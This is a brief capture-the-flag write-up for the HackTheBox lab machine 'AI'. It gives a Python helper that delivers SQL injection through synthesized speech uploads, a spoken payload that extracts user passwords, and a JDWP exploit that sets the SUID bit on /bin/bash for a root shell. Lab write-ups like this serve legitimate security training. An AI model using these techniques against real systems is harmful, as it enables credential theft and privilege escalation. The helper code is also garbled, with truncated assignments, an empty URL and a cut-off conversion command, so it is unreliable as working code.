AI @ HackTheBox

AI @ HackTheBox

AI is a 30 point machine on HackTheBox that involves SQL injection via speech and abusing an exposed java debugging port.


SQL injection helper:

#!/usr/bin/env python
import subprocess
import requests
import shutil
import json
import sys
import re

msg = sys.argv[1]

# text to speech
headers = {'Content-type' : 'application/x-www-form-urlencoded'}
url = ''
r =, data={'msg': msg, 'lang':'Joey','source':'ttsmp3'}, headers=headers)

# download result
url = json.loads(r.text)['URL']
r = requests.get(url, stream=True)
with open('tmp.mp3', 'wb') as f:
    shutil.copyfileobj(r.raw, f)

# convert['ffmpeg', '-i', 'tmp.mp3',

# upload & check result
url = 'http://ai.htb/ai.php'
files = {'fileToUpload': open('tmp.wav','rb')}
r =, files=files, data={'submit':'Process It!'})

Use helper to get the users password:

python3 'open single kwote. union select password from users comment database'

Exploit jdwp (with port forwarded to localhost):

searchsploit -x jdwp
searchsploit -m exploits/java/remote/
python -t localhost -p 8000 --cmd "chmod u+s /bin/bash"
/bin/bash -p

Share this post